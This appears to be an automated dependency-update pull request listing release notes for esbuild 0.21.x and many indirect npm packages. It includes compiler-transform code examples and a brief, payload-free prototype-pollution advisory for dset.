    This was contributed by @edewit.

0.21.5

  • Fix Symbol.metadata on classes without a class decorator (#3781)

    This release fixes a bug with esbuild's support for the decorator metadata proposal. Previously esbuild only added the Symbol.metadata property to decorated classes if there was a decorator on the class element itself. However, the proposal says that the Symbol.metadata property should be present on all classes that have any decorators at all, not just those with a decorator on the class element itself.

  • Allow unknown import attributes to be used with the copy loader (#3792)

    Import attributes (the with keyword on import statements) are allowed to alter how that path is loaded. For example, esbuild cannot assume that it knows how to load ./bagel.js as type bagel:

    // This is an error with "--bundle" without also using "--external:./bagel.js"
import tasty from "./bagel.js" with { type: "bagel" }

    Because of that, bundling this code with esbuild is an error unless the file ./bagel.js is external to the bundle (such as with --bundle --external:./bagel.js).

    However, there is an additional case where it's ok for esbuild to allow this: if the file is loaded using the copy loader. That's because the copy loader behaves similarly to --external in that the file is left external to the bundle. The difference is that the copy loader copies the file into the output folder and rewrites the import path while --external doesn't. That means the following will now work with the copy loader (such as with --bundle --loader:.bagel=copy):

    // This is no longer an error with "--bundle" and "--loader:.bagel=copy"
import tasty from "./tasty.bagel" with { type: "bagel" }

  • Support import attributes with glob-style imports (#3797)

    This release adds support for import attributes (the with option) to glob-style imports (dynamic imports with certain string literal patterns as paths). These imports previously didn't support import attributes due to an oversight. So code like this will now work correctly:

    async function loadLocale(locale: string): Locale {
  const data = await import(`./locales/${locale}.data`, { with: { type: 'json' } })
  return unpackLocale(locale, data)
}

    Previously this didn't work even though esbuild normally supports forcing the JSON loader using an import attribute. Attempting to do this used to result in the following error:

    ✘ [ERROR] No loader is configured for ".data" files: locales/en-US.data

    example.ts:2:28:
      2 │   const data = await import(`./locales/${locale}.data`, { with: { type: 'json' } })
        ╵                             ~~~~~~~~~~~~~~~~~~~~~~~~~~

    In addition, this change means plugins can now access the contents of with for glob-style imports.

  • Support ${configDir} in tsconfig.json files (#3782)

    This adds support for a new feature from the upcoming TypeScript 5.5 release. The character sequence ${configDir} is now respected at the start of baseUrl and paths values, which are used by esbuild during bundling to correctly map import paths to file system paths. This feature lets base tsconfig.json files specified via extends refer to the directory of the top-level tsconfig.json file. Here is an example:

    {
  "compilerOptions": {
    "paths": {
      "js/*": ["${configDir}/dist/js/*"]
    }
  }
}

    You can read more in TypeScript's blog post about their upcoming 5.5 release. Note that this feature does not make use of template literals (you need to use "${configDir}/dist/js/*" not `${configDir}/dist/js/*`). The syntax for tsconfig.json is still just JSON with comments, and JSON syntax does not allow template literals. This feature only recognizes ${configDir} in strings for certain path-like properties, and only at the beginning of the string.

  • Fix internal error with --supported:object-accessors=false (#3794)

    This release fixes a regression in 0.21.0 where some code that was added to esbuild's internal runtime library of helper functions for JavaScript decorators fails to parse when you configure esbuild with --supported:object-accessors=false. The reason is that esbuild introduced code that does { get [name]() {} } which uses both the object-extensions feature for the [name] and the object-accessors feature for the get, but esbuild was incorrectly only checking for object-extensions and not for object-accessors. Additional tests have been added to avoid this type of issue in the future. A workaround for this issue in earlier releases is to also add --supported:object-extensions=false.

0.21.4

  • Update support for import assertions and import attributes in node (#3778)

    Import assertions (the assert keyword) have been removed from node starting in v22.0.0. So esbuild will now strip them and generate a warning with --target=node22 or above:

    ▲ [WARNING] The "assert" keyword is not supported in the configured target environment ("node22") [assert-to-with]

    example.mjs:1:40:
      1 │ import json from "esbuild/package.json" assert { type: "json" }
        │                                         ~~~~~~
        ╵                                         with

  Did you mean to use "with" instead of "assert"?

    Import attributes (the with keyword) have been backported to node 18 starting in v18.20.0. So esbuild will no longer strip them with --target=node18.N if N is 20 or greater.

  • Fix for await transform when a label is present

    This release fixes a bug where the for await transform, which wraps the loop in a try statement, previously failed to also move the loop's label into the try statement. This bug only affects code that uses both of these features in combination. Here's an example of some affected code:

    // Original code
async function test() {
  outer: for await (const x of [Promise.resolve([0, 1])]) {
    for (const y of x) if (y) break outer
    throw 'fail'
  }
}

// Old output (with --target=es6)
function test() {
  return __async(this, null, function* () {
    outer: try {
      for (var iter = __forAwait([Promise.resolve([0, 1])]), more, temp, error; more = !(temp = yield iter.next()).done; more = false) {
        const x = temp.value;
        for (const y of x) if (y) break outer;
        throw "fail";
      }
    } catch (temp) {
      error = [temp];
    } finally {
      try {
        more && (temp = iter.return) && (yield temp.call(iter));
      } finally {
        if (error)
          throw error[0];
      }
    }
  });
}

// New output (with --target=es6)
function test() {
  return __async(this, null, function* () {
    try {
      outer: for (var iter = __forAwait([Promise.resolve([0, 1])]), more, temp, error; more = !(temp = yield iter.next()).done; more = false) {
        const x = temp.value;
        for (const y of x) if (y) break outer;
        throw "fail";
      }
    } catch (temp) {
      error = [temp];
    } finally {
      try {
        more && (temp = iter.return) && (yield temp.call(iter));
      } finally {
        if (error)
          throw error[0];
      }
    }
  });
}

  • Do additional constant folding after cross-module enum inlining (#3416, #3425)

    This release adds a few more cases where esbuild does constant folding after cross-module enum inlining.

    // Original code: enum.ts
export enum Platform {
  WINDOWS = 'windows',
  MACOS = 'macos',
  LINUX = 'linux',
}

// Original code: main.ts
import { Platform } from './enum';
declare const PLATFORM: string;
export function logPlatform() {
  if (PLATFORM == Platform.WINDOWS) console.log('Windows');
  else if (PLATFORM == Platform.MACOS) console.log('macOS');
  else if (PLATFORM == Platform.LINUX) console.log('Linux');
  else console.log('Other');
}

// Old output (with --bundle '--define:PLATFORM="macos"' --minify --format=esm)
function n(){"windows"=="macos"?console.log("Windows"):"macos"=="macos"?console.log("macOS"):"linux"=="macos"?console.log("Linux"):console.log("Other")}export{n as logPlatform};

// New output (with --bundle '--define:PLATFORM="macos"' --minify --format=esm)
function n(){console.log("macOS")}export{n as logPlatform};

  • Pass import attributes to on-resolve plugins (#3384, #3639, #3646)

    With this release, on-resolve plugins will now have access to the import attributes on the import via the with property of the arguments object. This mirrors the with property of the arguments object that's already passed to on-load plugins. In addition, you can now pass with to the resolve() API call which will then forward that value on to all relevant plugins. Here's an example of a plugin that can now be written:

    const examplePlugin = {
  name: 'Example plugin',
  setup(build) {
    build.onResolve({ filter: /.*/ }, args => {
      if (args.with.type === 'external')
        return { external: true }
    })
  }
}

require('esbuild').build({
  stdin: {
    contents: `
      import foo from "./foo" with { type: "external" }
      foo()
    `,
  },
  bundle: true,
  format: 'esm',
  write: false,
  plugins: [examplePlugin],
}).then(result => {
  console.log(result.outputFiles[0].text)
})

  • Formatting support for the @position-try rule (#3773)

    Chrome shipped this new CSS at-rule in version 125 as part of the CSS anchor positioning API. With this release, esbuild now knows to expect a declaration list inside of the @position-try body block and will format it appropriately.

  • Always allow internal string import and export aliases (#3343)

    Import and export names can be string literals in ES2022+. Previously esbuild forbid any usage of these aliases when the target was below ES2022. Starting with this release, esbuild will only forbid such usage when the alias would otherwise end up in output as a string literal. String literal aliases that are only used internally in the bundle and are "compiled away" are no longer errors. This makes it possible to use string literal aliases with esbuild's inject feature even when the target is earlier than ES2022.

0.21.3

  • Implement the decorator metadata proposal (#3760)

    This release implements the decorator metadata proposal, which is a sub-proposal of the decorators proposal. Microsoft shipped the decorators proposal in TypeScript 5.0 and the decorator metadata proposal in TypeScript 5.2, so it's important that esbuild also supports both of these features. Here's a quick example:

    // Shim the "Symbol.metadata" symbol
Symbol.metadata ??= Symbol('Symbol.metadata')

const track = (_, context) => {
  (context.metadata.names ||= []).push(context.name)
}

class Foo {
  @track foo = 1
  @track bar = 2
}

// Prints ["foo", "bar"]
console.log(Foo[Symbol.metadata].names)

    ⚠️ WARNING ⚠️

    This proposal has been marked as "stage 3" which means "recommended for implementation". However, it's still a work in progress and isn't a part of JavaScript yet, so keep in mind that any code that uses JavaScript decorator metadata may need to be updated as the feature continues to evolve. If/when that happens, I will update esbuild's implementation to match the specification. I will not be supporting old versions of the specification.

  • Fix bundled decorators in derived classes (#3768)

    In certain cases, bundling code that uses decorators in a derived class with a class body that references its own class name could previously generate code that crashes at run-time due to an incorrect variable name. This problem has been fixed. Here is an example of code that was compiled incorrectly before this fix:

    class Foo extends Object {
  @(x => x) foo() {
    return Foo
  }
}
console.log(new Foo().foo())

  • Fix tsconfig.json files inside symlinked directories (#3767)

    This release fixes an issue with a scenario involving a tsconfig.json file that extends another file from within a symlinked directory that uses the paths feature. In that case, the implicit baseURL value should be based on the real path (i.e. after expanding all symbolic links) instead of the original path. This was already done for other files that esbuild resolves but was not yet done for tsconfig.json because it's special-cased (the regular path resolver can't be used because the information inside tsconfig.json is involved in path resolution). Note that this fix no longer applies if the --preserve-symlinks setting is enabled.

0.21.2

  • Correct this in field and accessor decorators (#3761)

    This release changes the value of this in initializers for class field and accessor decorators from the module-level this value to the appropriate this value for the decorated element (either the class or the instance). It was previously incorrect due to lack of test coverage. Here's an example of a decorator that doesn't work without this change:

    const dec = () => function() { this.bar = true }
class Foo { @dec static foo }
console.log(Foo.bar) // Should be "true"

  • Allow es2023 as a target environment (#3762)

    TypeScript recently added es2023 as a compilation target, so esbuild now supports this too. There is no difference between a target of es2022 and es2023 as far as esbuild is concerned since the 2023 edition of JavaScript doesn't introduce any new syntax features.

0.21.1

  • Fix a regression with --keep-names (#3756)

    The previous release introduced a regression with the --keep-names setting and object literals with get/set accessor methods, in which case the generated code contained syntax errors. This release fixes the regression:

    // Original code
x = { get y() {} }

// Output from version 0.21.0 (with --keep-names)
x = { get y: /* @__PURE__ */ __name(function() {
}, "y") };

// Output from this version (with --keep-names)
x = { get y() {
} };

0.21.0

This release doesn't contain any deliberately-breaking changes. However, it contains a very complex new feature and while all of esbuild's tests pass, I would not be surprised if an important edge case turns out to be broken. So I'm releasing this as a breaking change release to avoid causing any trouble. As usual, make sure to test your code when you upgrade.

  • Implement the JavaScript decorators proposal (#104)

    With this release, esbuild now contains an implementation of the upcoming JavaScript decorators proposal. This is the same feature that shipped in TypeScript 5.0 and has been highly-requested on esbuild's issue tracker. You can read more about them in that blog post and in this other (now slightly outdated) extensive blog post here: https://2ality.com/2022/10/javascript-decorators.html. Here's a quick example:

    const log = (fn, context) => function() {
  console.log(`before ${context.name}`)
  const it = fn.apply(this, arguments)
  console.log(`after ${context.name}`)
  return it
}

class Foo {
  @log static foo() {
    console.log('in foo')
  }
}

// Logs "before foo", "in foo", "after foo"
Foo.foo()

    Note that this feature is different than the existing "TypeScript experimental decorators" feature that esbuild already implements. It uses similar syntax but behaves very differently, and the two are not compatible (although it's sometimes possible to write decorators that work with both). TypeScript experimental decorators will still be supported by esbuild going forward as they have been around for a long time, are very widely used, and let you do certain things that are not possible with JavaScript decorators (such as decorating function parameters). By default esbuild will parse and transform JavaScript decorators, but you can tell esbuild to parse and transform TypeScript experimental decorators instead by setting "experimentalDecorators": true in your tsconfig.json file.

    Probably at least half of the work for this feature went into creating a test suite that exercises many of the proposal's edge cases: https://github.com/evanw/decorator-tests. It has given me a reasonable level of confidence that esbuild's initial implementation is acceptable. However, I don't have access to a significant sample of real code that uses JavaScript decorators. If you're currently using JavaScript decorators in a real code base, please try out esbuild's implementation and let me know if anything seems off.

    ⚠️ WARNING ⚠️

    This proposal has been in the works for a very long time (work began around 10 years ago in 2014) and it is finally getting close to becoming part of the JavaScript language. However, it's still a work in progress and isn't a part of JavaScript yet, so keep in mind that any code that uses JavaScript decorators may need to be updated as the feature continues to evolve. The decorators proposal is pretty close to its final form but it can and likely will undergo some small behavioral adjustments before it ends up becoming a part of the standard. If/when that happens, I will update esbuild's implementation to match the specification. I will not be supporting old versions of the specification.

  • Optimize the generated code for private methods

    Previously when lowering private methods for old browsers, esbuild would generate one WeakSet for each private method. This mirrors similar logic for generating one WeakSet for each private field. Using a separate WeakMap for private fields is necessary as their assignment can be observable:

    let it
class Bar {
  constructor() {
    it = this
  }
}
class Foo extends Bar {
  #x = 1
  #y = null.foo
  static check() {
    console.log(#x in it, #y in it)
  }
}
try { new Foo } catch {}
Foo.check()

    This prints true false because this partially-initialized instance has #x but not #y. In other words, it's not true that all class instances will always have all of their private fields. However, the assignment of private methods to a class instance is not observable. In other words, it's true that all class instances will always have all of their private methods. This means esbuild can lower private methods into code where all methods share a single WeakSet, which is smaller, faster, and uses less memory. Other JavaScript processing tools such as the TypeScript compiler already make this optimization. Here's what this change looks like:

    // Original code
class Foo {
  #x() { return this.#x() }
  #y() { return this.#y() }
  #z() { return this.#z() }
}

// Old output (--supported:class-private-method=false)
var _x, x_fn, _y, y_fn, _z, z_fn;
class Foo {
  constructor() {
    __privateAdd(this, _x);
    __privateAdd(this, _y);
    __privateAdd(this, _z);
  }
}
_x = new WeakSet();
x_fn = function() {
  return __privateMethod(this, _x, x_fn).call(this);
};
_y = new WeakSet();
y_fn = function() {
  return __privateMethod(this, _y, y_fn).call(this);
};
_z = new WeakSet();
z_fn = function() {
  return __privateMethod(this, _z, z_fn).call(this);
};

// New output (--supported:class-private-method=false)
var _Foo_instances, x_fn, y_fn, z_fn;
class Foo {
  constructor() {
    __privateAdd(this, _Foo_instances);
  }
}
_Foo_instances = new WeakSet();
x_fn = function() {
  return __privateMethod(this, _Foo_instances, x_fn).call(this);
};
y_fn = function() {
  return __privateMethod(this, _Foo_instances, y_fn).call(this);
};
z_fn = function() {
  return __privateMethod(this, _Foo_instances, z_fn).call(this);
};

  • Fix an obscure bug with lowering class members with computed property keys

    When class members that use newer syntax features are transformed for older target environments, they sometimes need to be relocated. However, care must be taken to not reorder any side effects caused by computed property keys. For example, the following code must evaluate a() then b() then c():

    class Foo {
  [a()]() {}
  [b()];
  static { c() }
}

    Previously esbuild did this by shifting the computed property key forward to the next spot in the evaluation order. Classes evaluate all computed keys first and then all static class elements, so if the last computed key needs to be shifted, esbuild previously inserted a static block at start of the class body, ensuring it came before all other static class elements:

    var _a;
class Foo {
  constructor() {
    __publicField(this, _a);
  }
  static {
    _a = b();
  }
  [a()]() {
  }
  static {
    c();
  }
}

    However, this could cause esbuild to accidentally generate a syntax error if the computed property key contains code that isn't allowed in a static block, such as an await expression. With this release, esbuild fixes this problem by shifting the computed property key backward to the previous spot in the evaluation order instead, which may push it into the extends clause or even before the class itself:

    // Original code
class Foo {
  [a()]() {}
  [await b()];
  static { c() }
}

// Old output (with --supported:class-field=false)
var _a;
class Foo {
  constructor() {
    __publicField(this, _a);
  }
  static {
    _a = await b();
  }
  [a()]() {
  }
  static {
    c();
  }
}

// New output (with --supported:class-field=false)
var _a, _b;
class Foo {
  constructor() {
    __publicField(this, _a);
  }
  [(_b = a(), _a = await b(), _b)]() {
  }
  static {
    c();
  }
}

  • Fix some --keep-names edge cases

    The NamedEvaluation syntax-directed operation in the JavaScript specification gives certain anonymous expressions a name property depending on where they are in the syntax tree. For example, the following initializers convey a name value:

    var foo = function() {}
var bar = class {}
console.log(foo.name, bar.name)

    When you enable esbuild's --keep-names setting, esbuild generates additional code to represent this NamedEvaluation operation so that the value of the name property persists even when the identifiers are renamed (e.g. due to minification).

    However, I recently learned that esbuild's implementation of NamedEvaluation is missing a few cases. Specifically esbuild was missing property definitions, class initializers, logical-assignment operators. These cases should now all be handled:

    var obj = { foo: function() {} }
class Foo0 { foo = function() {} }
class Foo1 { static foo = function() {} }
class Foo2 { accessor foo = function() {} }
class Foo3 { static accessor foo = function() {} }
foo ||= function() {}
foo &&= function() {}
foo ??= function() {}

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ @​jridgewell/gen-mapping (indirect, 0.1.1 → 0.3.8) · Repo

Release Notes

0.3.5

What's Changed

Full Changelog: v0.3.4...v0.3.5

0.3.4

Full Changelog: v0.3.3...v0.3.4

0.3.3

Full Changelog: v0.3.2...v0.3.3

0.3.2

Internal

New Contributors

  • @ljharb made their first contribution in #4

Full Changelog: v0.3.1...v0.3.2

Does any of this look wrong? Please let us know.

Sorry, we couldn’t find anything useful about this release.

↗️ @​types/babel__core (indirect, 7.1.20 → 7.20.5) · Repo

Sorry, we couldn’t find anything useful about this release.

↗️ @​types/babel__generator (indirect, 7.6.4 → 7.6.8) · Repo

Sorry, we couldn’t find anything useful about this release.

↗️ @​types/babel__template (indirect, 7.4.1 → 7.4.4) · Repo

Sorry, we couldn’t find anything useful about this release.

↗️ @​types/babel__traverse (indirect, 7.18.2 → 7.20.6) · Repo

Sorry, we couldn’t find anything useful about this release.

↗️ @​types/debug (indirect, 4.1.7 → 4.1.12) · Repo

Sorry, we couldn’t find anything useful about this release.

↗️ @​types/hast (indirect, 2.3.4 → 3.0.4) · Repo

Sorry, we couldn’t find anything useful about this release.

↗️ @​types/mdast (indirect, 3.0.10 → 4.0.4) · Repo

Sorry, we couldn’t find anything useful about this release.

↗️ @​types/ms (indirect, 0.7.31 → 0.7.34) · Repo

Sorry, we couldn’t find anything useful about this release.

↗️ @​types/unist (indirect, 2.0.6 → 3.0.3) · Repo

Sorry, we couldn’t find anything useful about this release.

↗️ argparse (indirect, 1.0.10 → 2.0.1) · Repo · Changelog

Release Notes

2.0.1 (from changelog)

Fixed

  • Fix issue with process.argv when used with interpreters (coffee, ts-node, etc.), #150.

2.0.0 (from changelog)

Changed

  • Full rewrite. Now port from python 3.9.0 & more precise following. See doc for difference and migration info.
  • node.js 10+ required
  • Removed most of local docs in favour of original ones.

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 15 commits:

↗️ autoprefixer (indirect, 10.4.13 → 10.4.20) · Repo · Changelog

Release Notes

10.4.20

  • Fixed fit-content prefix for Firefox.

10.4.19

  • Removed end value has mixed support, consider using flex-end warning since end/start now have good support.

10.4.18

  • Fixed removing -webkit-box-orient on -webkit-line-clamp (@Goodwine).

10.4.17

  • Fixed user-select: contain prefixes.

10.4.16

10.4.15 (from changelog)

  • Fixed ::backdrop prefixes (by 一丝).
  • Fixed docs (by Christian Oliff).

10.4.14

  • Improved startup time and reduced JS bundle size (by @Knagis).

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 45 commits:

↗️ boxen (indirect, 6.2.1 → 8.0.1) · Repo

Release Notes

8.0.1

  • Downgrade cli-boxes (#102) 3cf4ea9
    • It turned out to not be compatible with the currently targeted Node.js version.

v8.0.0...v8.0.1

8.0.0

Breaking

Improvements

v7.1.1...v8.0.0

7.1.1

v7.1.0...v7.1.1

7.1.0

v7.0.2...v7.1.0

7.0.2

v7.0.1...v7.0.2

7.0.1

  • Use newline as line separator in all cases (#81) a94569b

v7.0.0...v7.0.1

7.0.0

Breaking

Improvements

v6.2.1...v7.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 22 commits:

↗️ convert-source-map (indirect, 1.9.0 → 2.0.0) · Repo

Commits

See the full diff on Github. The new version differs by 5 commits:

↗️ diff (indirect, 5.1.0 → 5.2.0) · Repo

Commits

See the full diff on Github. The new version differs by 47 commits:

↗️ dset (indirect, 3.1.2 → 3.1.4) · Repo

Security Advisories 🚨

🚨 dset Prototype Pollution vulnerability

Versions of the package dset before 3.1.4 are vulnerable to Prototype Pollution via the dset function due improper user input sanitization. This vulnerability allows the attacker to inject malicious object property using the built-in Object property proto, which is recursively assigned to all the objects in the program.

Release Notes

3.1.3

Patches

  • Add "types" export conditions for TypeScript "nodenext"/"node16" resolution: #40
    Thank you @Akkuma

Full Changelog: v3.1.2...v3.1.3

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 4 commits:

↗️ escape-string-regexp (indirect, 4.0.0 → 5.0.0) · Repo

Release Notes

5.0.0

Breaking

v4.0.0...v5.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 4 commits:

↗️ fraction.js (indirect, 4.2.0 → 4.3.7) · Repo

Sorry, we couldn’t find anything useful about this release.

↗️ github-slugger (indirect, 1.5.0 → 2.0.0) · Repo · Changelog

Release Notes

2.0.0

What's Changed

  • Use ESM by @wooorm in #43
    breaking: please read this guide
  • Add types by @wooorm in #44
    breaking: tiny chance of breaking, use a new version of TS and it’ll work

Full Changelog: v1.5.0...2.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 11 commits:

↗️ hast-util-from-parse5 (indirect, 7.1.0 → 8.0.2) · Repo

Release Notes

8.0.2

Miscellaneous

Types

Full Changelog: 8.0.1...8.0.2

8.0.1

Fix

  • 3c42476 Fix type of optional option

Full Changelog: 8.0.0...8.0.1

8.0.0

Change

  • cc4e5c5 Update @types/hast, utilities
    migrate: update too
  • 0c76e8a Change to require Node.js 16
    migrate: update too
  • a227695 Change to use exports
    migrate: don’t use private APIs
  • 81cde21 Remove support for passing file directly
    migrate: x -> {file: x}

Types

  • c6bd56c Add types of data fields
    expect values to be typed :)

Full Changelog: 7.1.2...8.0.0

7.1.2

Fix

Full Changelog: 7.1.1...7.1.2

7.1.1

Misc

Full Changelog: 7.1.0...7.1.1

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 46 commits:

↗️ hast-util-is-element (indirect, 2.1.2 → 3.0.0) · Repo

Release Notes

3.0.0

Change

  • a16a694 Update @types/hast, utilities
    migrate: update too
  • 6f20167 Change to require Node.js 16
    migrate: update too
  • 864ab64 Change to use exports
    migrate: don’t use private APIs
  • 0a5de58 Change types to work w/o explicit type parameter
    migrate: don’t pass an explicit type parameter;
    replace AssertAnything, AssertPredicate -> Check;
    TestFunctionAnything, TestFunctionPredicate -> TestFunction;
    PredicateTest -> Test

Full Changelog: 2.1.3...3.0.0

2.1.3

Misc

Full Changelog: 2.1.2...2.1.3

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 25 commits:

↗️ hast-util-parse-selector (indirect, 3.1.0 → 4.0.0) · Repo

Release Notes

4.0.0

Change

  • b64572f Update @types/hast
    migrate: update too
  • 7075bc4 Change to require Node.js 16
    migrate: update too
  • 6363e82 Remove support for TS 4.1
    migrate: update too
  • 339b417 Change to use exports
    migrate: don’t use private APIs

Full Changelog: 3.1.1...4.0.0

3.1.1

Misc

Full Changelog: 3.1.0...3.1.1

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 30 commits:

↗️ hast-util-raw (indirect, 7.2.2 → 9.1.0) · Repo

Release Notes

9.1.0

Add

Types

Full Changelog: 9.0.4...9.1.0

9.0.4

  • eda8d15 Fix crash on unfinished HTML in raw

Full Changelog: 9.0.3...9.0.4

9.0.3

  • 57c9910 Fix non-lowercase SVG elements not closing

Full Changelog: 9.0.2...9.0.3

9.0.2

Full Changelog: 9.0.1...9.0.2

9.0.1

Full Changelog: 9.0.0...9.0.1

9.0.0

Change

  • f0ceab5 Update @types/hast, utilities
    migrate: update too
  • 40ae4fa Change to require Node.js 16
    migrate: update too
  • 4edde89 Change to use exports
    migrate: don’t use private APIs
  • 246c313 Remove Raw type
    migrate: import it from mdast-util-to-hast
  • ae7296e Add smarter types for passThrough
    migrate: make sure to register custom nodes

Full Changelog: 8.0.0...9.0.0

8.0.0

Migrate

  • Node.js 12 is no longer supported, use Node 14.14+ or later
  • if you passed a file, please pass it in options: {file: file}
  • if you used complex-types.d.ts, please use index.d.ts instead

Change

Fix

  • b83ec5f Fix to reexport Raw from mdast-util-to-hast
  • e66705a Fix rcdata, rawtext, script data, and plaintext states
  • 8e7f703 Add improved error message for MDX nodes
  • 9910e6b Fix to deep clone unknown nodes

Misc

Full Changelog: 7.2.3...8.0.0

7.2.3

Full Changelog: 7.2.2...7.2.3

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 58 commits:

↗️ hast-util-to-html (indirect, 8.0.3 → 9.0.4) · Repo

Release Notes

9.0.4

Fix

Miscellaneous

Full Changelog: 9.0.3...9.0.4

9.0.3

  • 1c938b9 Fix head opening tag omission w/o title

Full Changelog: 9.0.2...9.0.3

9.0.2

Types

Misc

Full Changelog: 9.0.1...9.0.2

9.0.1

Performance

Full Changelog: 9.0.0...9.0.1

9.0.0

Change

  • 23a91fc Update @types/hast, utilities
    migrate: update too
  • 8c32af8 Change to require Node.js 16
    migrate: update too
  • 320b2ff Change to use exports
    migrate: don’t use private APIs
  • 15b1618 Remove entities option, use characterReferences
    migrate: options.entities -> options.characterReferences

Full Changelog: 8.0.4...9.0.0

8.0.4

Misc

Full Changelog: 8.0.3...8.0.4

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 47 commits:

↗️ hastscript (indirect, 7.1.0 → 9.0.0) · Repo

Release Notes

9.0.0

Breaking

  • 8a5f97e Add better custom element support by tightening overload detection
    (tiny chance of breaking, you’re most likely fine)

8.0.0

change

  • 04a40a5 Update @types/hast, utilities
    migrate: update too
  • 234405b Change to require Node.js 16
    migrate: update too
  • 7e27d65 Remove hastscript/html (auto runtime) from exports
    migrate: use hastscript
  • 6976cbb Remove hastscript/html, hastscript/svg from exports
    migrate: use hastscript

Full Changelog: 7.2.0...8.0.0

7.2.0

Add

Misc

Full Changelog: 7.1.0...7.2.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 37 commits:

↗️ html-void-elements (indirect, 2.0.1 → 3.0.0) · Repo

Release Notes

3.0.0

Change

  • 7b5cb87 Remove elements that are no longer void
    by @mohd-akram in #7
    (tiny chance of breaking, you probably don’t depend on stuff like nextid)

Full Changelog: 2.0.1...3.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 9 commits:

↗️ import-meta-resolve (indirect, 2.2.0 → 4.1.0) · Repo

Release Notes

4.1.0

Misc

  • d363b81 Refactor to hide deprecation warning
  • dbb53a5 Backport changes from Node
  • 66b952b Refactor tests to not assume name of project folder
    by @kapouer in #25

Full Changelog: 4.0.0...4.1.0

4.0.0

  • 4ba7a54 Backport changes from Node

Full Changelog: https://github.com/wooorm/import-meta-resolve/compare/3.1.0...4.0.0

3.0.0

  • dcaeda3 breaking: change to make resolve sync
    this changes the return type from Promise<string> to string
    migrate: change await resolve(x) to resolve(x)
    by @giltayar in #15
  • c6aa7d5 Backport changes from Node

Notice: This release drops support for Node 16. Migrate by using Node 18 or later.

Full Changelog: 2.2.2...3.0.0

2.2.2

Fix

Full Changelog: 2.2.1...2.2.2

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 32 commits:

↗️ js-yaml (indirect, 3.14.1 → 4.1.0) · Repo · Changelog

Release Notes

4.1.0 (from changelog)

Added

  • Types are now exported as yaml.types.XXX.
  • Every type now has options property with original arguments kept as they were (see yaml.types.int.options as an example).

Changed

  • Schema.extend() now keeps old type order in case of conflicts (e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as abcd instead of cbad).

4.0.0 (from changelog)

Changed

  • Check migration guide to see details for all breaking changes.
  • Breaking: "unsafe" tags !!js/function, !!js/regexp, !!js/undefined are moved to js-yaml-js-types package.
  • Breaking: removed safe* functions. Use load, loadAll, dump instead which are all now safe by default.
  • yaml.DEFAULT_SAFE_SCHEMA and yaml.DEFAULT_FULL_SCHEMA are removed, use yaml.DEFAULT_SCHEMA instead.
  • yaml.Schema.create(schema, tags) is removed, use schema.extend(tags) instead.
  • !!binary now always mapped to Uint8Array on load.
  • Reduced nesting of /lib folder.
  • Parse numbers according to YAML 1.2 instead of YAML 1.1 (01234 is now decimal, 0o1234 is octal, 1:23 is parsed as string instead of base60).
  • dump() no longer quotes :, [, ], (, ) except when necessary, #470, #557.
  • Line and column in exceptions are now formatted as (X:Y) instead of at line X, column Y (also present in compact format), #332.
  • Code snippet created in exceptions now contains multiple lines with line numbers.
  • dump() now serializes undefined as null in collections and removes keys with undefined in mappings, #571.
  • dump() with skipInvalid=true now serializes invalid items in collections as null.
  • Custom tags starting with ! are now dumped as !tag instead of !<!tag>, #576.
  • Custom tags starting with tag:yaml.org,2002: are now shorthanded using !!, #258.

Added

  • Added .mjs (es modules) support.
  • Added quotingType and forceQuotes options for dumper to configure string literal style, #290, #529.
  • Added styles: { '!!null': 'empty' } option for dumper (serializes { foo: null } as "foo: "), #570.
  • Added replacer option (similar to option in JSON.stringify), #339.
  • Custom Tag can now handle all tags or multiple tags with the same prefix, #385.

Fixed

  • Astral characters are no longer encoded by dump(), #587.
  • "duplicate mapping key" exception now points at the correct column, #452.
  • Extra commas in flow collections (e.g. [foo,,bar]) now throw an exception instead of producing null, #321.
  • __proto__ key no longer overrides object prototype, #164.
  • Removed bower.json.
  • Tags are now url-decoded in load() and url-encoded in dump() (previously usage of custom non-ascii tags may have led to invalid YAML that can't be parsed).
  • Anchors now work correctly with empty nodes, #301.
  • Fix incorrect parsing of invalid block mapping syntax, #418.
  • Throw an error if block sequence/mapping indent contains a tab, #80.

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ magic-string (indirect, 0.25.9 → 0.30.17) · Repo · Changelog

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ markdown-table (indirect, 3.0.2 → 3.0.4) · Repo

Release Notes

3.0.4

Types

Miscellaneous

Full Changelog: 3.0.3...3.0.4

3.0.3

Full Changelog: 3.0.2...3.0.3

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 19 commits:

↗️ mdast-util-definitions (indirect, 5.1.1 → 6.0.0) · Repo

Release Notes

6.0.0

Change

  • 900cf9a Update @types/mdast
    migrate: update too
  • 79d4d61 Change to require Node.js 16
    migrate: update too
  • 9e02a5b Change to use export map
    migrate: don’t use private APIs
  • 4a93553 Change to return undefined, not null
    migrate: expect undefined

Full Changelog: 5.1.2...6.0.0

5.1.2

Misc

Full Changelog: 5.1.1...5.1.2

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 20 commits:

↗️ mdast-util-from-markdown (indirect, 1.2.0 → 2.0.2) · Repo

Release Notes

2.0.2

Types

Full Changelog: 2.0.1...2.0.2

2.0.1

Fix

  • 4aa8425 Fix end point of texts ending in character reference

Types

Full Changelog: 2.0.0...2.0.1

2.0.0

Change

  • 843e046 Update @types/mdast and friends
    migrate: update too
